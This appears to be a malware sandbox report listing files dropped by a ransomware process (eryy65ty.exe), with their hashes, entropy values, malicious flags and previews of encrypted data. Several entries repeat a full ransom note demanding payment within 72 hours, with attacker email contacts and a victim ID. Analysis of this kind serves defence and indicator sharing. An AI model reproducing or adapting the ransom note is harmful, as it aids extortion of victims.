                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Secret Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4694
                                                                                                    Entropy (8bit):7.927713577381661
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:AWQHcicEWc5VmSWV4NijDbF2nbdrgbS0E2wlMJJCfhi2x+Hwun24h6oa:AWQrHrM4cYRkqbgHP1Ta
                                                                                                    MD5:D066290B5D5DC959728BB5D167AEB9DB
                                                                                                    SHA1:92D5643A7353A32182268402B445CDA4D6ED5901
                                                                                                    SHA-256:0E420CB311F67EC21694A7B20DC547D4EAC56103E33C32D7FD883627218D501C
                                                                                                    SHA-512:C2F0529174BB3EA97B78097FB9C8E7A4665AA8FBBAB4E9A0084BEBC8C0EC78E2CF1E68F4D102E06D72172867C13376E44CFA6710C6188B1267AAA485FB7F2C1B
                                                                                                    Malicious:true
                                                                                                    Preview:.. ..7('.'..nQ..y\..........ipL..c.j....!.....*p./...M........../x.os42-....M.....5<i!.u..........O..>.;..z%C..>..-...A.qB...^..tH..C......e.,].G.(.:.....N...*.......Y..+.7.z..cx.<rL.!95....~l.....|iO...I.j..t?9..|...{@...B^...w=..I...T.].o?...&|s..?.RO..#..L..Y...B[.. ,.>../...x.F.lC....5.l~=....T..a..........veX3.h..Dr..K/s7...I....^|0Y.....S..5PN.=.!...6,.#2..U..^..u..'.akpK;.h.........@....q...........Q_y.A...tg1....s[.6.....8OJs.m.......x..o.`.C. .%m.Q..i&Vv..<.s.n.C.N.P...vk.U~.cF...;".........._.9......../...#$z.-....=...0.......'.8....>.P...4.....$..RNcqA...X.|.1.T.....3'{...AU....".U.....B[..7^a.%...M..q.g..^.........C<|....R...m...("l..f....R'.M.,Z.,.7%..m..W..=$W..?...Mn/a..._...Y....}.........m>".n...3.Hjr..>^._..Tq./.yj....$....ZFI.Z...uZ........%..c..........;..wM....#....`....5L.....Ir....""....=.y.%&........U.....u...j....V...:r#...#....>..U!.&....T...A.<,...j?.q..}4..+fA...>......9.......U.p...)..W=<..\R..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Secret Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4694
                                                                                                    Entropy (8bit):7.927713577381661
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:AWQHcicEWc5VmSWV4NijDbF2nbdrgbS0E2wlMJJCfhi2x+Hwun24h6oa:AWQrHrM4cYRkqbgHP1Ta
                                                                                                    MD5:D066290B5D5DC959728BB5D167AEB9DB
                                                                                                    SHA1:92D5643A7353A32182268402B445CDA4D6ED5901
                                                                                                    SHA-256:0E420CB311F67EC21694A7B20DC547D4EAC56103E33C32D7FD883627218D501C
                                                                                                    SHA-512:C2F0529174BB3EA97B78097FB9C8E7A4665AA8FBBAB4E9A0084BEBC8C0EC78E2CF1E68F4D102E06D72172867C13376E44CFA6710C6188B1267AAA485FB7F2C1B
                                                                                                    Malicious:false
                                                                                                    Preview:.. ..7('.'..nQ..y\..........ipL..c.j....!.....*p./...M........../x.os42-....M.....5<i!.u..........O..>.;..z%C..>..-...A.qB...^..tH..C......e.,].G.(.:.....N...*.......Y..+.7.z..cx.<rL.!95....~l.....|iO...I.j..t?9..|...{@...B^...w=..I...T.].o?...&|s..?.RO..#..L..Y...B[.. ,.>../...x.F.lC....5.l~=....T..a..........veX3.h..Dr..K/s7...I....^|0Y.....S..5PN.=.!...6,.#2..U..^..u..'.akpK;.h.........@....q...........Q_y.A...tg1....s[.6.....8OJs.m.......x..o.`.C. .%m.Q..i&Vv..<.s.n.C.N.P...vk.U~.cF...;".........._.9......../...#$z.-....=...0.......'.8....>.P...4.....$..RNcqA...X.|.1.T.....3'{...AU....".U.....B[..7^a.%...M..q.g..^.........C<|....R...m...("l..f....R'.M.,Z.,.7%..m..W..=$W..?...Mn/a..._...Y....}.........m>".n...3.Hjr..>^._..Tq./.yj....$....ZFI.Z...uZ........%..c..........;..wM....#....`....5L.....Ir....""....=.y.%&........U.....u...j....V...:r#...#....>..U!.&....T...A.<,...j?.q..}4..+fA...>......9.......U.p...)..W=<..\R..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):316
                                                                                                    Entropy (8bit):7.2785726105698805
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:XJn+h1vvf6dULmnhi+66dqnre7cPD312lphGQT6CieDdg2OWJTsDNs4EbP/NWSBJ:XUT6iUhi+xqnuc7l2lTG+rO6lpfn
                                                                                                    MD5:3580C2A63B2EF92B6AA1199261425A8D
                                                                                                    SHA1:F7006FF2C6C42CE0BF02F7964B095837C535FD29
                                                                                                    SHA-256:D93E037F5CF1F4E13E7906E3FAD2946576CF6806B2035678483C157FC25CEDD3
                                                                                                    SHA-512:1B145693A14387BE12C185B8050E397D753238683D916C516B94A927BC0491FDB20FB3C9EE1875CBA60BAF22C7898E5C7BB56B8B73FD5FE9510D27DA74B32D34
                                                                                                    Malicious:true
                                                                                                    Preview:P..<..b.PB..~Wl..Gt.q..a7+o.E.@_.P.^D..oY..#a..t0}.4.Q......F9.D.......<u~...hF.:.OX.D..Q..%..{....w.66.....c..\.Ms....R!.~.....3....h{..R..5....ZM7..6...7c...sK...N.-..u...S....<f.O.De......84.u...(.E...K....ho.dj..#.!.^.O.....hv.l#.]...>.)..._....&...i..(.T4...<..........W.....?Q.?.N.0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):316
                                                                                                    Entropy (8bit):7.2785726105698805
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:XJn+h1vvf6dULmnhi+66dqnre7cPD312lphGQT6CieDdg2OWJTsDNs4EbP/NWSBJ:XUT6iUhi+xqnuc7l2lTG+rO6lpfn
                                                                                                    MD5:3580C2A63B2EF92B6AA1199261425A8D
                                                                                                    SHA1:F7006FF2C6C42CE0BF02F7964B095837C535FD29
                                                                                                    SHA-256:D93E037F5CF1F4E13E7906E3FAD2946576CF6806B2035678483C157FC25CEDD3
                                                                                                    SHA-512:1B145693A14387BE12C185B8050E397D753238683D916C516B94A927BC0491FDB20FB3C9EE1875CBA60BAF22C7898E5C7BB56B8B73FD5FE9510D27DA74B32D34
                                                                                                    Malicious:false
                                                                                                    Preview:P..<..b.PB..~Wl..Gt.q..a7+o.E.@_.P.^D..oY..#a..t0}.4.Q......F9.D.......<u~...hF.:.OX.D..Q..%..{....w.66.....c..\.Ms....R!.~.....3....h{..R..5....ZM7..6...7c...sK...N.-..u...S....<f.O.De......84.u...(.E...K....ho.dj..#.!.^.O.....hv.l#.]...>.)..._....&...i..(.T4...<..........W.....?Q.?.N.0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):98570
                                                                                                    Entropy (8bit):0.6455065458067311
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:69r3EfyCYznrrQwwKe5q6I50z1iez1SQuJm8nKU0V8snrDRhH:69okrQNPq4piezoQuJVnVohH
                                                                                                    MD5:210AF4AEC998C500143734D0E278E22F
                                                                                                    SHA1:1BB85BF2E02E8FC2A90D75B814C77ACB66D6D966
                                                                                                    SHA-256:5A54600A269CE26BEDC2A4A46662E02D78C3AE7D4D4341EFF7685737C699632F
                                                                                                    SHA-512:964B0DFF6A87BEA6D0E7C4BBD65076EBC6E46F023A81481285877F2661C0E430202A9EBE9538452601E2CB8DA26731AD65AAAB2FC2C9DCB1F7E9F66984D9964C
                                                                                                    Malicious:true
                                                                                                    Preview:ku.v.v=)..].W..w.....L.j.yK.w..L.h8..hT...D-k.jW.~...4..].}z....;.*Md...T...Np...E.r.1..=...!...g7.sL...j.0.fs.@...Q...J.b...a.#.....;,....H2....h.1.hz.9..5<Bf#I....PA.6hVx.Q|..7\..#......4n.M/...o...F,xFB.......6..N7.....OQ...{.#..<\.....2k.z$.l.t.U..n&[.+...~.9.[</'..X.4$r..t>..u...K..v.o{..De|p....N!+..~...*..._..j.Qp.....3.kd-..$..w..r.uOdY..t.6o.l2.....Bv'.9o....~.!..,6.."....3..A#3...'.`.SS....z..c.`...d"..m..}.2.....)q.9.JK.-FbG46....--9wS..-_.IB..........f.)0.r...5..h...E..h...{.."=.b...y...N.._.m...x..y1mk...xAA2....4.FS.2...[S-.......{...?.D.j...n...UfTs..aDs.F....xh.,[.Ma.....=.5u...6.....8..*./.......)7RU...N..J|..st.....L...T..]......5/...z}N...q....l.. Bao...6.D;...C.Q..V.}.;...=.^&.yrE.?... :8..S....R.....y.=GZ...a.d..>w'..O..E...0..0...@.?..".....^I..g..>..o K.lo...' .+....OZ.....+...6NI..5..TJ}.....|\5.|G..dd..D.g..Z#\.?.G..<..C...[.)......[..b......y.R..4.i$...8.......F...t.3.h..1...Mw.....rp....g..r....t...$..OzhG..;._....ah[..G
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6080675099197024
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Ah1IyH3qE9Ng0vFXoBBwlpqKJ6QuQQ6BFJ5u9zmmv4ROpPDuz+DT:u1cEdWPwlpqKJ6/SBFnu9zThDuzgT
                                                                                                    MD5:0C07F1DB13899CBBCF617D846B89DD69
                                                                                                    SHA1:F17510449CFAAC1E89E2DDAAF83C43E675D5E2F3
                                                                                                    SHA-256:CC151748F00F8D8DDB6C408067B1AB5B721009197168F11069DC357362A504AD
                                                                                                    SHA-512:5BE9D3C7131BECFE0807361604CEE5EF798C233BE253FB0DB84C7892F38AF25B11652420C49E454DCD9C90E201B322F88DABC11B971F6A38714FAED2EAB99BE0
                                                                                                    Malicious:true
                                                                                                    Preview:.R....M....c.wLy.w3.....B....m.Z,.bQ..c2X..:.J..K.5ry.t*.T..%t.2c...y.C..(1....YaW..-g.8....^...S...2.K..'.]EO.K......=..F.....+..O......Q._.1........qR=..x$.iP....$..b..K..ItG.j_.......3.=f.l0....L..m%gNw......d.H...{q.6.8)_x...{...[.JbU......(......>.9......EfEk)5./.b.+S~.V........x..K.D.=....<C......C.ju.?_...Q..?PV..O.B..i.aKk.T.'.Al..y3.....F.)....."....L......<6I.SaP.\..DYog7QW.C.&.!>.2n...R....Y..e.S...&Y_....p.-.j.......T....9..k...^.F..Uft^U....h.N.E..,.F.....=.?."..'.=."...7...Y...n.....f3(..&.!.._.D$.b.mblI..m....O]`.}q^.......C...?.U....=...j..<.M9Fk.W.\^.q....X<.?..9..^.4?.Y.].wv.h?y....\.(....`.....1..27..S.5..;..N......S..15...8.%..0.{.{..6.U..sJ..E...J......(......H_..%.u...............7...x.&8.V]....s.H..I...._.N&..V..=.9.m.`(J...cK...2h....6.....?._.x.`.2x....3X..I.......'-..v....ZE.%Y.4..S.v..e0RMf!...Lo$..@vD.aKs.j..:.h_......$...LJ......0.....}.z6k....e.TFs.G...F..J....... _..W.....g...v.e?n.8..D^./6.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6080675099197024
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Ah1IyH3qE9Ng0vFXoBBwlpqKJ6QuQQ6BFJ5u9zmmv4ROpPDuz+DT:u1cEdWPwlpqKJ6/SBFnu9zThDuzgT
                                                                                                    MD5:0C07F1DB13899CBBCF617D846B89DD69
                                                                                                    SHA1:F17510449CFAAC1E89E2DDAAF83C43E675D5E2F3
                                                                                                    SHA-256:CC151748F00F8D8DDB6C408067B1AB5B721009197168F11069DC357362A504AD
                                                                                                    SHA-512:5BE9D3C7131BECFE0807361604CEE5EF798C233BE253FB0DB84C7892F38AF25B11652420C49E454DCD9C90E201B322F88DABC11B971F6A38714FAED2EAB99BE0
                                                                                                    Malicious:false
                                                                                                    Preview:.R....M....c.wLy.w3.....B....m.Z,.bQ..c2X..:.J..K.5ry.t*.T..%t.2c...y.C..(1....YaW..-g.8....^...S...2.K..'.]EO.K......=..F.....+..O......Q._.1........qR=..x$.iP....$..b..K..ItG.j_.......3.=f.l0....L..m%gNw......d.H...{q.6.8)_x...{...[.JbU......(......>.9......EfEk)5./.b.+S~.V........x..K.D.=....<C......C.ju.?_...Q..?PV..O.B..i.aKk.T.'.Al..y3.....F.)....."....L......<6I.SaP.\..DYog7QW.C.&.!>.2n...R....Y..e.S...&Y_....p.-.j.......T....9..k...^.F..Uft^U....h.N.E..,.F.....=.?."..'.=."...7...Y...n.....f3(..&.!.._.D$.b.mblI..m....O]`.}q^.......C...?.U....=...j..<.M9Fk.W.\^.q....X<.?..9..^.4?.Y.].wv.h?y....\.(....`.....1..27..S.5..;..N......S..15...8.%..0.{.{..6.U..sJ..E...J......(......H_..%.u...............7...x.&8.V]....s.H..I...._.N&..V..=.9.m.`(J...cK...2h....6.....?._.x.`.2x....3X..I.......'-..v....ZE.%Y.4..S.v..e0RMf!...Lo$..@vD.aKs.j..:.h_......$...LJ......0.....}.z6k....e.TFs.G...F..J....... _..W.....g...v.e?n.8..D^./6.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.23509365326752
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:OFNmORjiB4KIxYgsKS5HUQzv4g4L5oMeUMAYlhgwjLjji0BGoJptn:yjyXIxYgDS7OveUYqsXjiIrJptn
                                                                                                    MD5:3B6A289C97A353376880F8C41670F372
                                                                                                    SHA1:8F9D634BB06C13B956967A9F5F7657FDA59DD77D
                                                                                                    SHA-256:A251C2CF5B1E7921A2D5852351A8A4F84B219BEF1C0346CF50BD7A2DF9E50A52
                                                                                                    SHA-512:F1954A22EB766015A2FF83A85BBB55EE01C0ACE48CC91958F65695EE3463304D0E77BC54A665E1A0CD804E8C327EA0F3598BFA1A3E8D8FA110E9BCF55E716961
                                                                                                    Malicious:true
                                                                                                    Preview:E....x..,..N9c.............., ."..x..E.....H......=...a.l+.q+./.$...F.O.W.3<s@.......ZG..-..~Zu...E.$.;94J.....l.6.....Cr:x8.....|.......c.:5:.'..C9\.co.*...&...WUy.n...5..&.&.x..,3...1p.r...}..;..{.tI-$iOLs.........sY&..q.'...D$.6...}.....-.S.#$..b-...r..e.......Fk?X..[..0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):98570
                                                                                                    Entropy (8bit):0.6455065458067311
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:69r3EfyCYznrrQwwKe5q6I50z1iez1SQuJm8nKU0V8snrDRhH:69okrQNPq4piezoQuJVnVohH
                                                                                                    MD5:210AF4AEC998C500143734D0E278E22F
                                                                                                    SHA1:1BB85BF2E02E8FC2A90D75B814C77ACB66D6D966
                                                                                                    SHA-256:5A54600A269CE26BEDC2A4A46662E02D78C3AE7D4D4341EFF7685737C699632F
                                                                                                    SHA-512:964B0DFF6A87BEA6D0E7C4BBD65076EBC6E46F023A81481285877F2661C0E430202A9EBE9538452601E2CB8DA26731AD65AAAB2FC2C9DCB1F7E9F66984D9964C
                                                                                                    Malicious:false
                                                                                                    Preview:ku.v.v=)..].W..w.....L.j.yK.w..L.h8..hT...D-k.jW.~...4..].}z....;.*Md...T...Np...E.r.1..=...!...g7.sL...j.0.fs.@...Q...J.b...a.#.....;,....H2....h.1.hz.9..5<Bf#I....PA.6hVx.Q|..7\..#......4n.M/...o...F,xFB.......6..N7.....OQ...{.#..<\.....2k.z$.l.t.U..n&[.+...~.9.[</'..X.4$r..t>..u...K..v.o{..De|p....N!+..~...*..._..j.Qp.....3.kd-..$..w..r.uOdY..t.6o.l2.....Bv'.9o....~.!..,6.."....3..A#3...'.`.SS....z..c.`...d"..m..}.2.....)q.9.JK.-FbG46....--9wS..-_.IB..........f.)0.r...5..h...E..h...{.."=.b...y...N.._.m...x..y1mk...xAA2....4.FS.2...[S-.......{...?.D.j...n...UfTs..aDs.F....xh.,[.Ma.....=.5u...6.....8..*./.......)7RU...N..J|..st.....L...T..]......5/...z}N...q....l.. Bao...6.D;...C.Q..V.}.;...=.^&.yrE.?... :8..S....R.....y.=GZ...a.d..>w'..O..E...0..0...@.?..".....^I..g..>..o K.lo...' .+....OZ.....+...6NI..5..TJ}.....|\5.|G..dd..D.g..Z#\.?.G..<..C...[.)......[..b......y.R..4.i$...8.......F...t.3.h..1...Mw.....rp....g..r....t...$..OzhG..;._....ah[..G
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.193433389444299
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:YbecFGRriNY1wEJOTiUbKTbc5QE/TH6+9q6nYSn:YbeXieyTiUbKYQMH6L6YSn
                                                                                                    MD5:76A1E268B37CA68DBDB3CDC14D47CA7B
                                                                                                    SHA1:739B9F04B9819506FFDD196E385B675A10BF9550
                                                                                                    SHA-256:FB643B8AB508E229BF38316B4A8ABA3CC1AAE9B5622FF9538F35980D5710515F
                                                                                                    SHA-512:1D2127CDA74E9C193A5D0842F5FBB43BF1D062E60A8CAAB08F1B0FB861B5472E318BEE72A57E423789363F1E7DA983EEB9444C34195C4ABE26BEA78F9EBE6C8A
                                                                                                    Malicious:true
                                                                                                    Preview:r.....~.N.w..............5.........r.p......B..i').\,.....*..!.h..~ s%.f...x./.K,Y.we..u%4..z.....$T&.X$.........'....._0N;i(.....ZJ..6....^.-Z7W.mZ.$..Q..v...|......^.a+..P...v..Ee....m|.Al}4Sy|.06b...g0'ID.D.X.7..!QS.pN,. .......M........S..~/V.'........Q.._L.b.Uc 0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):313
                                                                                                    Entropy (8bit):7.3907783420768025
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:eIXoSRxHNqs0R+WnVaqLYb2EAM+K9ghgYvwen6oRFs1uCgwn:WSHks++WnlYEMngRvwen6oPCgwn
                                                                                                    MD5:92AAE6E35C520586AC01DD430F3658A5
                                                                                                    SHA1:012B0A72F2731FD94167C5B79B2F780C1EDE2045
                                                                                                    SHA-256:1D86551FE4B30091A71694D9F18A6AAA74E6216D84E4603DA48287F4F10CC57D
                                                                                                    SHA-512:3F95C7F67D5DC88811AD7EAA6E4A6AA514EA5DEBB5739704FF1330BB59605629B7807C30689ACC974D6034500ED56D092E29EA3555E6C0FF409B9DD76F9CB1A5
                                                                                                    Malicious:true
                                                                                                    Preview:.fb.a.&...k...ni.=z...|?Qy.|..TistUse": null.}...nO...z&eM.R..,0..W...-z3).-.hZ..'...sL'H&.....7..&..tI1n.'..3W.L...N.sst~.t.6.R..P`..z...dW...J.%.....#...#Z.o.ke.C4....Pr....w..^.~...K.][>..]N.Q..q;.....y....vJ...x.K.G.UaX/.:.$.x..=......S......o...3?7 q.c.Tk9...5....T.U...:....*B,.=.w.O...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):313
                                                                                                    Entropy (8bit):7.3907783420768025
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:eIXoSRxHNqs0R+WnVaqLYb2EAM+K9ghgYvwen6oRFs1uCgwn:WSHks++WnlYEMngRvwen6oPCgwn
                                                                                                    MD5:92AAE6E35C520586AC01DD430F3658A5
                                                                                                    SHA1:012B0A72F2731FD94167C5B79B2F780C1EDE2045
                                                                                                    SHA-256:1D86551FE4B30091A71694D9F18A6AAA74E6216D84E4603DA48287F4F10CC57D
                                                                                                    SHA-512:3F95C7F67D5DC88811AD7EAA6E4A6AA514EA5DEBB5739704FF1330BB59605629B7807C30689ACC974D6034500ED56D092E29EA3555E6C0FF409B9DD76F9CB1A5
                                                                                                    Malicious:false
                                                                                                    Preview:.fb.a.&...k...ni.=z...|?Qy.|..TistUse": null.}...nO...z&eM.R..,0..W...-z3).-.hZ..'...sL'H&.....7..&..tI1n.'..3W.L...N.sst~.t.6.R..P`..z...dW...J.%.....#...#Z.o.ke.C4....Pr....w..^.~...K.][>..]N.Q..q;.....y....vJ...x.K.G.UaX/.:.$.x..=......S......o...3?7 q.c.Tk9...5....T.U...:....*B,.=.w.O...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Secret Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):341
                                                                                                    Entropy (8bit):7.410986169734962
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:GsplqNS93nQdTX1OR3NwixS0BwRucIiBYQZ8wEIBIwkPkO3HAEh5XwWL6JiMSpEW:GsplT93yXERBiucKlcIwkgETwM6/b1dm
                                                                                                    MD5:2194177CA49DCD42F4FDC96B1A8ADB7E
                                                                                                    SHA1:68739D50A3A148EB8F047D072BB0D6CA9580621D
                                                                                                    SHA-256:947FA66ECE4713807146E9C5FB97C23DD59250513BD92F951AC0D9BC3CDA8430
                                                                                                    SHA-512:92555D9C8FD53E86B233D69B642C4996F4F424CBAC6484866F5D313AD8B7FC05E81F7E09980A462F2A539ABF80F9992A3309A1D0041887DA199B719F0CB11AEE
                                                                                                    Malicious:false
                                                                                                    Preview:..L.wkg+...n@.Wl....O.0\S._W.)...dW!P...;o5.C.o.$..ZUv...H.-..ocked=1.........V..(rEi.a.&.dV..%...g:}.....?....e..$W.`..".&.4.qp4.2.:...z..(....j`TV....\........!.9...h$3.u..>Vm7......A:...r$us........s..N...-....l .@.......>| ...C.v%i../pqm......3..........%............*.^..R.O3..3,.I|.........4.G.MBw.7~..-..w..?.N0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Secret Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):341
                                                                                                    Entropy (8bit):7.410986169734962
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:GsplqNS93nQdTX1OR3NwixS0BwRucIiBYQZ8wEIBIwkPkO3HAEh5XwWL6JiMSpEW:GsplT93yXERBiucKlcIwkgETwM6/b1dm
                                                                                                    MD5:2194177CA49DCD42F4FDC96B1A8ADB7E
                                                                                                    SHA1:68739D50A3A148EB8F047D072BB0D6CA9580621D
                                                                                                    SHA-256:947FA66ECE4713807146E9C5FB97C23DD59250513BD92F951AC0D9BC3CDA8430
                                                                                                    SHA-512:92555D9C8FD53E86B233D69B642C4996F4F424CBAC6484866F5D313AD8B7FC05E81F7E09980A462F2A539ABF80F9992A3309A1D0041887DA199B719F0CB11AEE
                                                                                                    Malicious:false
